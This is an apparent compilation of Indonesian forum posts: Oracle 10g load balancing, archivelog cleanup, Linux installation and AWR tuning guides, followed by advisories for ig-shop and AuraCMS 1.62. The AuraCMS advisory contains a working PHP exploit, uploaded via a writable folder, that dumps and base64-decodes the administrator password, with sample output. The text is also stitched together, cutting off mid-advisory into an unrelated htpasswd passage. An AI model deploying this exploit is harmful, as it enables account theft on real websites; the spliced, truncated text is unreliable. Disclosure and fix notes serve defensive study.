Oleh sebab itu, banyak perusahaan TI yang berlomba-lomba memberikan solusi terbaik bagi perusahaan agar dapat memaksimalkan kerja departemen TI itu sendiri. Mulai dari pembuatan software, outsourcing, perencanaan infrastruktur, sampai produk yang dinamakan business solution.

Dengan banyaknya kebutuhan yang diperlukan oleh sebuah perusahaan, maka hampir setiap perusahaan besar membagi inftastruktur TI-nya menjadi beberapa bagianpenting, yang dikategorikan menurut aplikasinya. Misalnya, untu keperluan e-mail perusahaan, maka perusahaan akan membangun sebuah mail server khusus. Atau untuk perusahaan yang memiliki database cukup besar, maka perusahaan tersebut akan memiliki sebuat server khusus yang akan menangani ERP.

Tidak hanya sampai di situ saja, untuk dapat kuat dan memadai server dan jaringan yang ada juga harus ditunjang oleh berbagai komponen penting, seperti system keamanan yang terpercaya, maintenance yang dapat diandalkan, serta system control yang baik.

Load balancing. Adalah sebuah konsep yang gunanya untuk menyeimbangkan beban atau muatan pada infrastruktur TI sebuah perusahaan. Agar seluruh departemen dapat dimanfaatkan secara maksimal dan optimal.
Beberapa perusahaan TI yang telah meluncurkan solusi total dari konsep load balancing : HP dengan utility computing, IBM dengan Utility On Demand, Sun dengan Sun and I, Oracle dengan 10g.

10g dari Oracle
Dinamakan juga grid computing. Pada dasarnya, grid disini, dimaksudkan dengan clusters dari sebuah computer atau server yang saling berhubungan satu sama lain, untuk bekerja sama saling berbagi resources.
10g bekerja pada servers database dan aplikasi. Dengan adanya 10g, maka system dapat saling berbagi ruang maupun kemampuan sehingga system yang satu dengan yang lainnya dapat bekerja lebih optimal dan efisien. Untuk lebih jelasnya, perhatikan aplikasi 10g berikut:

Sebuah bank terdapat empat buah server dengan keperluan yang berbeda satu sama lain, seperti server SCM, ERP, CRM dan e-mail. Tentu saja ke-empat-empatnya harus dibangun dengan sistem yang lengkap, baik dari segi hardware maupun keamanannya. Padahal kerja ke-empat-empatnya tidak selalu sama dari hari ke hari. Contoh saja e-mail server, pada hari libur server akan tidak bekerja 100%, mengingat pada akhir pecan tidak terlalu banyak e-mail yang bersliweran. Namun pada akhir pekan banyak transaksi melalui ATM yang berlangsung. Sehingga server yang digunakan untuk transaksi tersebut dapat memanfaatkan resources yang tersedia melimpah pada e-mail server. Lain halnya jika anda tidak menggunakan 10g atau konsep load balancing.Server untuk transaksi tetap bekerja dengan supersibuk, sementara e-mail server menganggur sia-sia. Mengapa demikian? Pada 10-g, semua server akan dikumpulkan menjadi satu kesatuan secara virtual sehingga satu sama lain dapat saling memanfaatkan resources.

Sistem grid computing sendiri memiliki beberapa komponen penting selain 10-g nya, yaitu beberapa komponen seperti hardware dalam infrastruktur yang kuat dapat diandalkan. Seperti Internet, blader server, perangkat jaringan, SAN, storage Array (RAID), serta processor 32-bit – 64 bit.

Blade server
Blade server menjadi salah satu komponen penting dari 10g, karena server ini dapat bersifat plug and play yang memudahkan dalam peng-upgrade- an system. Satu rack blade server dapat menampung sebanyak 280 server sekaligus. Dalam setiap satu blade server biasanya terdapat satu atau dua processor dengan memory. Pada pengoperasiannya blade server tidak memelukan energi yang besar dan tidak mengeluarkan panas yang berlebihan, sehingga cukup efisien untuk digunakan.
Blade server juga biasa disebut high density server yang bekerja pada system cluster dan biasanya digunakan untuk satu task saja. Misalnya, file sharing saja atau streaming audio serta video dan sebagainya. Dan karena alasa cluster ini, maka blade server cocok untuk digunakan dalam konsep load blancing. Awalnya, IBM yang memperkenalkan server jenis ini, namun kini sudah banyak perusahaan TI yang telah memproduksinya seperti HP dan SUN Microsystems.

SAN
SAN (Storage Area Network) adalah jaringan yang khusus menangani dan menghubungi berbagai macam perangkat storage. SAN memiliki hubungan lansung ke server dan memungkinkan komuunikasi data antar – server.
Oleh karena itu, storage area network yang baik juga merupakan dukungan penting bagi 10g. Sebab biar bagaimanapun, untuk dapat mengoptimalkan akses data memang dibutuhkan jaringan yang kuat dari data itu sendiri.

RAID
RAID (Redundant Array of Independent Disks) adalah sebuah system yang memungkinkan menyimpan data yang sama pada saat yang bersamaan di tempat yang berbeda. Namun, anda tidak akan mengetahui HDD mana yang berperan sebagai HDD utama dan mana yang bukan.
Untuk perusahaan yang membutuhkan waktu uptime yang tinggi, misalnya 100%, maka teknologi RAID menjadi pilihan wajib. Sehingga bila terjadi kerusakan pada satu bagian data/storage system akan tetap mampu berjalan sebagaimana mestinya.

Kalo LOAD BALANCING untuk database, setahu saye nih menurut pengalaman ada 3 masalah. (ORACLE)

1. File over : menerapkan 2 database pada 2 server yanng memiliki konsep sama,
dalam artian fisik dan konsep database yang dibangun harus sama.Kemudian pada saat instalasi
oracle harus ada parameter tambahan yang harus di instal (saya lupa parameternya coba nanti saya cek lagi)
setelah itu kita buat scheduling untuk backup data. Memang kerja 2X, akan tetapi jika salah satu server mati maka akan ada backup dari
server kedua. (tolong di ralat)
2. Clustering : Pada dasarnya kita meringkas kerja, dalam artian begini pada saaat kita mengakses
beberapa tabel kita akan menggunakan banyak where. untuk meringkas hal tersebut maka kita buat clustering
sehingga .... ya lebih cepat he he he .....!!!
3. partitioning : Permasalahan yang timbul pada saat pengaksesan index yang sering. Oleh sebab itu object yang memiliki index
tersebut kita ibaratkan di ambil dan dibuatkan sebuah object tersendiri. sehingga kita cukup mengakses object baru tersebut
Hal ini bertujuan untuk meringkas dan mempercepat pekerjaan.
Saran dari penulis Kalo anda menggunakan ORACLE cobalah memanfaatkan perangkat lunak
“TOAD for ORACLE”. Coba aja pake LVS ( kalo OS nya Linux via NAT/network address translation)
Maaf kalo ada salah-salah kata or penjelasan yang kurang jelas. soalnya ga bisa menyusun kata-kata. 

Dear all.... saya mau berbagi pengalaman aja nih soal Oracle, kasusnya adalah saya membuat otomatic archived log...tersimpan pada folder default.

Perhari log transaksi saya sebesar 5 - 10 GB, dan saya sudah mengalokasikan space sebesar 100 GB pada folder archived log (saya menggunakan Oracle 10g dan linux RHELAS3).

Permasalahannya adalah saat saya menghapus file archived log secara fisik di harddisk, tetapi pada oraclenya sendiri sizenya tidak berubah…

Sehingga saat space sudah tidak mencukupi akan terjadi error redolog dan saya mengatasi permasalahan tersebut dengan menambah size space
pada folder archived log, dan ini sangat mengganggu karena file tersebut akan terus membesar. Yang berikutnya adalah berhubung saya menggunakan OEM 10g berbasis web maka semua komputer dalam satu jaringan dapat mengakses OEM (walaupun ada user/IP yang boleh mengakses server database tetapi tidak boleh mengakses databasenya)

pertanyaannya adalah :

1. Bagaimana mensinkronkan ukuran size secara fisik di hardisk dengan size dioraclenya?
2. Apa yang menjadi kriteria dalam pengahapusan archived log file(usia kadaluarsa)?
3. Bagaimana membuat agar penghapusan archived log file dilakukan secara otomatis secara fisik?
4. Bagaimana membatasi IP mana saja yang boleh mengakses database?

Setelah mencari-cari jawaban lewat milis dan situs Oraclenya sendiri, ditemukan penyelesainnya....OK!!langsung saja.

1. Bagaimana mensinkronkan ukuran size secara fisik di hardisk dengan size dioraclenya?

Apabila file archivelog dihapus langsung tanpa menggunakan rman, maka informasi archivelog tsb masih tersimpan di controlfile.

Untuk mengsinkronkan informasi tsb, dari rman:

export ORACLE_SID=mysid
rman target /
crosscheck archivelog all;
delete expired archivelog all;

Sebaiknya menghapus archivelog dilakukan dari rman.
Misalkan utk menghapus archivelog yg lebih tua dari 1hari di disk:

delete archivelog all completed before ‘sysdate-1’;

Atau utk menghapus archivelog yg sequencenya <= 1000.

delete archivelog until sequence 1000;

2. Apa yang menjadi kriteria dalam pengahapusan archived log file(usia kadaluarsa)?

Archivelog akan di-keep di disk selama diperlukan.
Untuk itu Anda mesti mengecek retention policy untuk backup. Dari rman:

show retention policy;

kalau tidak pernah diubah, maka hasilnya akan seperti ini:

CONFIGURE RETENTION POLICY TO REDUNDANCY 1; # default

yg artinya Oracle akan meng-keep satu versi full backup, yg meliputi full database backup + semua archivelog setelah full backup tsb dilakukan.

Coba cek website ini utk detail bagaimana cara Oracle me-maintain FRA.

http://download-east.oracle.com/docs/cd/B19306_01/
backup.102/b14192/setup005.htm

Intinya adalah:
- Oracle akan meng-keep file2 yg ada di FRA selama FRA size masih dibawah nilai DB_RECOVERY_FILE_DEST_SIZE.
- Kalau sudah penuh, Oracle akan mencari file2 mana yg obsolete berdasarkan retention policy-nya, dan akan otomatis dihapus.

3. Bagaimana membuat agar penghapusan archived log file dilakukan secara otomatis secara fisik?

Untuk pertanyaan ini solusinya adalah menghapus dengan mengunakan rman/jangan menghapus langsung dari sisi OS, buat scheduller untuk menjalankan rman (sesuai dengan jawaban no.1).

4. Bagaimana membatasi IP mana saja yang boleh mengakses database?

Coba masuk ke Server Oracle, pilih Oracle Net Manager (terletak di folder Configuration and Migration Tools), kemudian pilih Profile, lalu pilih tab Access Rights.
Disitu bisa diatur IP mana saja yang boleh dan tidak boleh mengakses database.

------------------------------------------------------------

Shoutz:
~~~~~~
~ forum|staff (roninmorgue, darkstar, admin, qnoyyy, gaga, kalion,
WaferStick, newbie, cloud, acieis)
~ mercubuana-it@yahoogroups.com ,
~ x-code staff n members at yogya_family_code, ^family_code^,
---------------------------------------------------------------

Contact:
~~~~~~~~
roninmorgue || forum|staff
Homepage: http://www.forum.mercubuana-it.org/
email: roninmorgue[at]yahoo[dot]co[dot]id
anstellwinkel[at]yahoo[dot]com[dot]au
petambakudang[at]yahoo[dot]co[dot]id
---------------- [ EOF ] ----------------------------------------

Langsung aja ya...cos gw nga suka basa basi, sebenarnya artikel ini gw buat berdasarkan pengalaman gw saat melakukan instalasi oracle10g di server baru.
Dan juga tadinya buat xcode magazine 4, tapi kayanya telat deh...jadi baru sekarang bisa gw kirim.

Semoga artikel ini bisa menjadi referensi yang baik, karena jujur aja ... artikel yang menjelaskan instalasi oracle10g dilinux jarang banget yang berbahasa Indonesia, sekalipun ada nga menyeluruh.
Btw...tetep gw jadiin referensi, selain dari situs oracle-nya sendiri.

Ok, pertama DL dulu oracle10g for linux dari situs oraclenya di
http://otn.oracle.com/software/products ... index.html

file --> ship.db.lnx32.cpio.gz

gunzip ship.db.lnx32.cpio.gz

* unpack file ship.db.lnx32_10103.cpio
--> # cd /app
# cpio -idmv < ship.db.lnx32_10103.cpio atau jika sudah ditulis dalam cdrom :
--> # cd /app
# cpio -idmv < /mnt/cdrom/ship.db.lnx32_10103.cpio

pemeriksaan memory dan swap

# grep MemTotal /proc/meminfo
# grep SwapTotal /proc/meminfo

jika swap kurang dari 1 ghz

# dd if=/def/zero of=tmpswap bs=1k count=700000
# chmod 600 tmpswap
# mkswap tmpswap
# swapon tmpswap

pemeriksaan kapasitas direktori /tmp

# df /tmp

memperbaharui parameter kernel

# /etc/sysctl.conf
--> # Kernel Parameters for oracle 10.1.0 #
kernel.shmall = 2097152
kernel.shmmax = 2147483648
kernel.shmmni = 4096
kernel.sem = 250 32000 100 128
fs.file-max = 65536
net.ipv4.ip_local_port_range = 1024 65000
setelah selesai jalankan # sysctl -p

mengatur limit maximum file dan proses

# /etc/security/limits.conf
--> # To increase the shell limits for oracle 10.1.0 #
* soft nproc 2047
* hard nproc 16384
* soft nofile 4096
* hard nofile 63536

# /etc/profile
--> if [ $USER = “oracle” ]; then
if [ $SHELL = “/bin/ksh” ]; then
ulimit -p 16384
ulimit -n 63536
else
ulimit -u 16384 -n 63536
fi
fi
export ORACLE_BASE=/app/oracle;
export ORACLE_HOME=$ORACLE_BASE/product/10.0.1;
export ORACLE_SID=ora10g;

setelah disimpan berikan perintah # source /etc/profile

membuat group, user, dan direktori

# mkdir -p /app/oracle/product/10.0.1
# mkdir -p /var/app/oracle
# groupadd dba {memiliki hak akses SYSDBA}
# groupadd oinstall {pemilik software}
# useradd -c “Oracle Software Owner” -g oinstall -G dba oracle -d /app/oracle

owner dan hak akses direktori

# chown -R oracle:oinstall /app/oracle
# chown oracle:dba /var/app/oracle
# chmod 755 /app/oracle
# chmod 755 /var/app/oracle

INSTALASI

dari terminal root
# xhost +

dari terminal lain
# su - oracle
$ cd /app/Disk1
$ ./runInstaller

pada saat proses instalasi anda diminta menjalankan file /app/oracle/oraInventory/orainstRoot.sh
melalui user root

dari terminal root
# cd /app/oracle/oraInventory
# ./orainstRoot.sh

setelah proses instalasi selesai, sebelum klik tombol OK..jalankan file root.sh melalui user root

dari terminal root
# cd /app/oracle/product/10.1.0
# ./root.sh

Sampai sini proses instalasi oracle10g sudah selesai.

nb : Saat Linux direstart maka oracle tidak berjalan secara otomatis, kita harus membuat script otomasi untuk menjalankan database dan mengaktifkan oracle enterprise manager

dari terminal root
#ubah konfigurasi listener
#vi /app/oracle/product/10.1.0/network/admin/listener.ora

SID_LIST_LISTENER =
(SID_LIST =
(SID_DESC =
(SID_NAME = PLSExtProc)
(ORACLE_HOME = /app/oracle/product/10.1.0)
(PROGRAM = extproc)
)
)

dengan

SID_LIST_LISTENER =
(SID_LIST =
(SID_DESC =
(SID_NAME = PLSExtProc)
(ORACLE_HOME = /app/oracle/product/10.1.0)
(PROGRAM = extproc)
)
(SID_DESC =
(GLOBAL_DBNAME = ora10g)
(ORACLE_HOME = /app/oracle/product/10.1.0)
(SID_NAME = ora10g)
)
)

edit setting di file /etc/oratab file dengan “Y”:
# vi /etc/oratab
ora10g:/u01/app/oracle/product/10.1.0:Y

Buat script pada file /etc/init.d/dbora
# vi /etc/init.d/dbora
:
#!bin/sh
#chkconfig: - 20 80
#description: Oracle autostart-stop script
#
#coding by gugun gunawan
#
#set ORA_HOME to be equivalent to the $ORACLE_HOME
#from which you execute dbstart
#/etc/init.d/dbora

ORACLE_HOME=/app/oracle/product/10.1.0;
ORACLE_OWNER=oracle;

#Start oracle database
su - $ORACLE_OWNER -c $ORACLE_HOME/bin/dbstart
su - $ORACLE_OWNER -c $ORACLE_HOME/bin/lsnrctl start

#Untuk menjalankan oracle enterprise manager control
su - $ORACLE_OWNER $ORACLE_HOME/bin/emctl start dbconsole

------eof-----

edit file /app/oracle/product/10.1.0/bin/dbstart
# vi /app/oracle/product/10.1.0/bin/dbstart
ORATAB=/app/opt/oracle/oratab
dengan
ORATAB=/etc/oratab

edit/tambahkan file /etc/rc.local
# vi /etc/rc.local
/etc/init.d/dbora

=================================================================
notes :
script dibuat berdasarkan percobaan yang sudah dilakukan penulis dan berjalan dengan baik, script dibuat untuk lebih memudahkan
=================================================================

referensi :
Administrasi Oracle 10g, Evara Samsyiar
InfoLinux 02/2005 dan 03/2005 (instalasi oracle 9i pada RH9)
http://www.oracle.com/technology/pub/ar ... stall.html
Oracle Database Concepts : http://dba.ipbhost.com/lofiversion/index.php/t879.html

Setelah sekian lama gw ngga muncul2...maklumlah lagi sibuk banget nih. Buat para
admin dan moderator forum lainnya gw minta maaf yah.

OK...langsung aja deh, gw ingin berbagi pengalaman gw sendiri nih mengenai
administrasi database oracle selain SQL Server2000(gw bingung mo yang mana yang
diduluin nih)

spek :
Sun Solaris Server (SPARC)
Oracle 10G DataBase

pada tulisan ini Pengenalan Dulu deh -->

--> Oracle Enterprise Manager 10g
pada oracle 10g OEm telah berupa aplikasi berbasis web, sehingga DBAdmin dapat
melakukan semua aktifitas pengaturan database melalui web browser.
Ada 2 tipe OEM :
1. Oracle Enterprise Manager Database Control yang dapat diinstal pada setiap database.
2. Oracle Enterprise Manager Grid control yang dapat diinstall terpisah.

Jika menggunakan OEM release 1, maka secara default akan terinstall dengan menggunakan
port 5500 sehingga dapat diakses dengan alamat http://[nama_host]:5500/em.

--> Manajemen dengan Target Home Pages
halaman ini digunakan oleh para DBAdmin untuk mengetahui kinerja database, informasi
yang ditampilkan meliputi :
* General status
* aktifitas pemakaian CPU
* availabilitas
* pemakaian media penyimpan
* Informasi bantuan dari ADDM
* informasi job
* alert

--> OEM untuk administrasi
pada menu ini dapat dapat dilakukan pengaturan control files, tablespaces dan datafiles,
undo segments, redo log groups, instance memori, dsb. DBA juga dapat membuat job
scheduler dalam bentuk grafik.

--> OEM untuk Performance Tuning
Kinerja dari aktifitas database dapat dipantau dalam bentuk grafik sehingga akan segera
diketahui apabila terjadi penurunan terhadap kinerja database.

Ok!! itu sekilas pengenalan tentang Oracle 10g, dah pada bosan yah....lanjut deh!!!!!

PERFORMANCE TUNING
oracle 10g memiliki fitur yang disebut AWR (automatic workload repository) yang berfungsi
melakukan capture informasi-informasi yang berhubungan dengan aktifitas kinerja database
dan menyimpannya dalam bentuk repository sehingga dengan informasi ini terdeteksi
permasalahan yang menghambat kinerja database.
AWR mengumpulkan data2 statistik, seperti:
* lama waktu pada setiap aktifitas database
* Objek2 yang diakses pada database
* statistik tertentu yang diambil dari V$SYSSTAT dan V$SESSSTAT
* Query yang menghambat kinerja database
* satistik dari OS

untuk melihat komponen2 statistik yang dikumpulkan oleh AWR dapat digunakan view
V$STATISTICS_LEVEL

SQL> select statistics_name, activation_level
2 from v$statistics_level;

STATISTICS_NAME ACTIVAT
-------------------------------------- -------
Buffer Cache Advice TYPICAL
MTTR Advice TYPICAL
Timed Statistics TYPICAL
Timed OS Statistics ALL
Segment Level Statistics TYPICAL
PGA Advice TYPICAL
Plan Execution Statistics ALL
Shared Pool Advice TYPICAL
Modification Monitoring TYPICAL
Longops Statistics TYPICAL
Bind Data Capture TYPICAL
Ultrafast Latch Statistics TYPICAL
Threshold-based Alerts TYPICAL
Global Cache Statistics TYPICAL
Cache Stats Monitor TYPICAL
Active Session History TYPICAL
Undo Advisor, Alerts and Fast Ramp up TYPICAL

17 rows selected

SQL>

Data tersebut dikumpulkan AWR untuk digunakan Automatic Database Diagnostic
Monitor(ADDM) untuk dianalisa.

AWR REPORT
untuk menampilkan report kita gunakan script awrrpt.sql dan awrrpti.sql yang
dapat diakses pada direktori $ORACLE_HOME dbmsadmin

SQL> conn sys/oracle as sysdba
Connected.

SQL> @? dbmsadminawrrpt.sql
Snap
Instance DB Name Snap Id Snap Started Level
----------- ----------- --------------- ------------------ -------
orcl ORCL 1 01 Oct 2006 21:08 1
2 01 Oct 2006 21:15 1

--- 8 01 Oct 2006 22:09 1
9 01 Oct 2006 22:17 1

pilih batas awal dan akhir Snap Id untuk dilakukan analisa, misal 8 dan 9

Specify the Begin and End Snapshot Ids
--------------------------------------
Enter value for begin_snap : 8
Begin Snapshot Id specified: 8

Enter value for end_snap : 9
End Snapshot Id specified: 9

Buat nama file analisa, misal analisa.html

Specify the Report Name
-----------------------
The default report file name is awrrpt_1_8_9.html. To use
this name,
press to continue, otherwise enter an alternative.

Enter value for report_name: /dbase/mccdbase/analisa.html

Sepertinya...sampai sini dulu deh, sebenarnya masih banyak sih yang pengen gw
share but kayanya ngga mungkin deh. So...jadi tulisan ini cuma sekedar untuk
ngebuka wawasan kita-kita aja, siapa tahu ada yang tertarik dengan dunia
database

Karena banyak ilmu yang menarik man...jujur aja ilmu ini hampir ngga kita dapatkan
dari kampus, seperti ->

Administrasi Database
Data Mining &
Pemrograman Database

Apaan tuh datamining.... wah lain kali deh gw kasih tahu yah...!!
but yang paling banyak dipake tentu aja SQL yang advance alias ngga cuma select,
insert, update dan delete smile

Dunia database itu luas man!!!! berminat...????? 

Author: roninmorgue
Date: April, 29th 2006
Location: Indonesia, Jakarta
Web: http://www.forum.mercubuana-it.org/

--------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ig-shop is advance free e-commerce, written in php.

Download : http://prdownloads.sourceforge.net/ig-s ... p?download
Online support info@igeneric.co.uk
Website http://www.igeneric.co.uk
Version :
Tested in version 1.2
not tested in older or maybe newer version
-------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Full Path Disclosure :

poc :
http://jouninhackers/ig-shop/ig_shop/pa ... oduct_id=1
dengan menghilangkan nomor index produk.
http://jouninhackers/ig-shop/ig_shop/pa ... roduct_id=

Warning: Cannot add header information - headers already sent by (output started at
c:apachehtdocsig-shopig_shopclass.FastTemplate.php:349) in c:apachehtdocs
ig-shopig_shopproduct.php on line 211

akan terlihat pesan error pada halaman disertai dengan path lengkap dari path
server menuju path domain kita…

vulnerability terjadi pada fungsi module_product_view_show($module_id,$param)

product.php
function module_product_view_show($module_id,$param) {
global $tpl,$product_id,$view_image,$type_id,$session,$HTTP_COOKIE_VARS;
if (!$product_id) {
sleep(2);
header("Location: index.php");
}

dengan class FastTemplate pada file class.FastTemplate.php

pada fungsi module_product_view_show($module_id,$param) apabila index produk tidak ada
maka akan didirect pada halaman index.php tetapi pada class FastTemplate telah
ditampilkan terlebih dahulu halaman produk pilihan sehingga error handling mengalami
kegagalan fungsi.

B. Hidden field vulnerability

pada saat checkout sebenarnya sudah diterapkan proses validasi harga yang dilakukan oleh server

view_chart.php
if ($pids) {
$result = mysql_query("select p.*,mf.name as manuf_name,t.name as type_name from catalog_product
as p left join catalog_manuf as mf on p.manuf_id = mf.manuf_id left
join catalog_type as t on p.type_id = t.type_id
where p.product_id in ($pids) group by p.product_id order by mf.name,p.model");
if ($result && mysql_num_rows($result)) {
$tpl->parse("HTML”,"head");
$tpl->FastPrint("HTML");
$total = 0;
while ($l = mysql_fetch_array($result)) {
$tpl->$%@!&#$_SENCORED_$%@!&#$(array("PRODUCT_ID" => “$l[product_id]”,
“MODEL” => strip_tags($l[model]),
“CODE” => “$l”,
“TYPE” => strip_tags($l[type_name]),
“PRICE” => sprintf("%.2f",$l[price]),
“MANUF” => “$l[manuf_name]"));
===================potong============================
sehingga user tidak dapat melakukan perubahan data/nilai dengan cara merubah kode pada klien dengan
teknik mendownload halamaman dalam bentuk HTML

tetapi pada level payment gateway (cart.php) terdapat script:
if ($new_order)
$grandtotal = “$total+$shipping”;
$pmisi = “
Igeneric Order Confirmation
==================================
Order ID: $session[order_id]
SubTotal: $total
Shipping: $shipping
Total: $grandtotal

====================================
Billing Information
====================================
Salutation: $data[salutation]
First Name: $data[first
==========================potong=================
yang apabila didownload oleh klien dalam bentuk HTML akan menghasilkan script :

<form name="cart" action="https://www.secpay.com/java-bin/ValCard" method="post">
<input type="hidden" name="merchant" value="mikenu01">
<input type="hidden" name="trans_id" value="13">
<input type="hidden" name="callback" value="#">
==========================potong=================
<input type="hidden" name="amount" value="5100005.00">
<input type="hidden" name="order"
value="<order class=’com.secpay.seccard.Order’<
<orderLines class=’com.secpay.seccard.OrderLine’<
<OrderLine<

require user roninmorgue
</Limit>

Dalam contoh di atas, untuk mengakses direktori tersebut dibutuhkan userid
“roninmorgue” dan password yang sama dengan entry userid roninmorgue di berkas
“/home/roninmorgue/.kuncirahasia”. Ketika direktori tersebut diakses, akan muncul
sebuah pop-up window yang menanyakan userid dan password.
Password di dalam berkas “/home/roninmorgue/.kuncirahasia” dapat dibuat dengan
menggunakan program “htpasswd”.
unix% htpasswd -c /home/roninmorgue/.kuncirahasia roninmorgue
New password: ***********
----------------------------------------------------------

Shoutz:
~~~~~~~

~ forum|staff (roninmorgue, darkstar, admin, qnoyyy, gaga, kalion, WaferStick, newbie)
~ mercubuana-it@yahoogroups.com ,

----------------------------------------------------------

Contact:
~~~~~~~~

roninmorgue || forum|staff
Homepage: http://www.forum.mercubuana-it.org/
email: roninmorgue[at]yahoo[dot]co[dot]id

Author: roninmorgue
Date: May, 27th 2006
Location: Indonesia, Jakarta
Web: http://www.forum.mercubuana-it.org/
-----------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
AuraCMS162 is a free Content Management System, written in php.
Author: Arif Supriyanto - arif@ayo.kliksini.com
http://www.auracms.tk
http://www.semarang.tk
http://www.ayo.kliksini.com
http://www.auracms.opensource-indonesia.com

Version : 1.62
tested on AuraCMS1.62
not tested on other/older or maybe the newer version but it is
possible be the same
-----------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
Setelah begitu banyaknya vulnerability yang ditemukan sampai dengan versi 1.61,
dimana saya sendiri menemukannya dan telah mengontak vendor serta mendapatkan
tanggapan yang posistif maka vendor mengeluarkan versi 1.62 yang telah melakukan
patching terhadap file-file yang mengandung vulenerability.

vulnerability yang masih dapat diexploit pada versi 1.62 ->

A. PHP Local Root Exploit :

petunjuk peng-install-an AuraCMS162 ->

Upload file ke webhosting.
set file permission seperti berikut :
chmod 755 untuk file-file *.php
chmod 777 untuk folder /images
chmod 777 untuk folder /files
chmod 777 to file /mod/online.db.txt
chmod 777 to file /mod/counter.txt
chmod 777 to file /mod/month.txt
chmod 777 to file /mod/today.txt

terlihat bahwa folder /files memberikan akses 777, dimana kita dapat menulis file
pada folder tersebut.

Folder /files adalah folder yang digunakan untuk menyimpan file-file yang dapat
didownload serta kita dapat menguploadnya.

B. Administrator Account Vulnerability :

AuraCMS <= 1.62 tidak melakukan enkripsi terhadap username pada tabel user;
AuraCMS <= 1.62 menggunakan enkripsi fungsi base64_encode untuk menyimpan password admin
sebagaimana kita ketahui bahwa fungsi base64_encode dapat kita dekripsi dengan fungsi
base64_decode dengan mudah…

log.php

if(ereg("log.php",$PHP_SELF)) {
if ($_POST[k]==’check’){
include “config.php”;
$result = mysql_query("SELECT * FROM user WHERE user=’$user’”, $koneksi_db);
$num = mysql_numrows($result);
$row = mysql_fetch_row($result);
$password = base64_encode($password);
if($password!=$row[3] || $num<=0){echo”
alert(’Username or Password is wrong !’);
window.history.go(-1); “;}
else{
session_register("info");
//session_register("user_loged");
$info = base64_encode("$row[1]:$row[2]:$row[3]");
=====================potong==============================
Jadi sekarang bagaimana kita mengexploitasi auracms162 dari 2 buah vulnerability yang
kita ketahui… , Ok!!langsung saja, saya telah menulis script sederhana untuk mendapatkan
account dari administrator dan mendekripsinya.

Catt : script ini harus diupload ke server target -> http://www.target.com/files/auraExploit.php
caranya -> terserah anda, bisa dengan menyisipkan script ini pada file yang akan kita upload
dan berdoa mudah-mudahan adminnya ngga tahu… smile

poc :

auraExploit.php
<?php
/*****************************************************/
/* Hacking AuraCMS162: Hacking auraCMS162 with PHP Local Root Exploit */
/* ===========================================================*/
/* */
/* Copyright (c) 2006 by anstellwinkel (anstellwinkel@yahoo.com.au) */
/* or roninmorgue@yahoo.co.id */
/* */
/* Program ini adalah free software. Anda dapat mendistribusikannya dan */
/* memodifikasinya sesuai keinginan anda dengan tetap menyertakan */
/* nama author */
/* Published Date:12:15:47 Sunday, May 28, 2006 */
/****************************************************/

print " =======================================";
print " AuraCMS162 Local Root Exploit";
print " =======================================";

print "[+] Now attacking ";
print "[+] Building page extension..";
$exploit_file = fopen("hackaura.php", "a+");
print "[DONE]";
print "[+] Set User Autentification..";
$the_exploit = "<?
include("../config.php");
mysql_connect($mysql_host, $mysql_user, $mysql_password);
$hasil =mysql_db_query($mysql_database, "SELECT * FROM user");
while($data = mysql_fetch_array($hasil))
{
$user = $data[user];
$pass = $data[password];
}
echo "Username: $user";
echo "EncryptPassword: $pass";
echo "DecryptPassword:";
echo base64_decode($pass);

?>”;
print “[DONE]”;
print “[+] Sending bugs writable [a+]..”;
print “[+] Create hackaura.php...”;
if (flock($exploit_file, LOCK_EX)) {
fputs($exploit_file, $the_exploit);
flock($exploit_file, LOCK_UN);
print “[OK] “;

print “[+] Sending bugs..[DONE]!!”;
print “[*] Exploited Successed!”;
print “ “;
print “------------------------------------------------”;
print “ + Information:[anstellwinkel@yahoo.com.au]-[www.forum.mercubuana-it.org] +”;
print “-----------------------------------------------------”;
}else {

print “[!] [FAILED] Permission is not writable!!”;
print “-----------------------------------------------”;
print “ + Information:[anstellwinkel@yahoo.com.au]-[www.forum.mercubuana-it.org] +”;
print “----------------------------------------------------”;
}

fclose($exploit_file);
print “<a href=hackaura.php>Aura Administrator Exploited”;
?>
------------------[EOF]-----------------------------------
attack sample
target ->> http://jouninhackers/auracms162/files/auraExploit.php

=======================================
AuraCMS162 Local Root Exploit
=======================================
[+] Now attacking
[+] Building page extension..[DONE]
[+] Set User Autentification..[DONE]
[+] Sending bugs writable [a+]..
[+] Create hackaura.php...[OK] [+] Sending bugs..[DONE]!!
[*] Exploited Successed!
------------------------------------------------------------------
+ Information:[anstellwinkel@yahoo.com.au]-[www.forum.mercubuana-it.org] +
------------------------------------------------------------------
Aura Administrator Exploited

klik link “Aura Administrator Exploited”

http://jouninhackers/auracms162/files/hackaura.php
Username: roninmorgue
EncryptPassword: cjBuMW5tMHJndTM=
DecryptPassword:r0n1nm0rgu3
------------------------------------------------------------------
The fix:
~~~~~~~~

Vendor sudah dihubungi,
Perbaikan sendiri:
1. matikan fungsi modul download/upload.
2. jika tetap mengaktifkannya periksa dengan teliti setiap file yang diupload, ingat anda
adalah admin..!!!
3. buat fungsi untuk menghapus setiap file yang memiliki extension .php pada folder /files
dan /images.
4. ganti enkripsi password dengan fungsi MD5

----------------------------------------------------------------
Shoutz:
~~~~~~~
~ forum|staff (roninmorgue, darkstar, admin, qnoyyy, gaga, kalion, WaferStick, cloud, newbie)
~ mercubuana-it@yahoogroups.com ,
---------------------------------------------------------------
Contact:
~~~~~~~~

roninmorgue || forum|staff
Homepage: http://www.forum.mercubuana-it.org/
email: roninmorgue[at]yahoo[dot]co[dot]id
-------------------------------- [ EOF ] ---------------------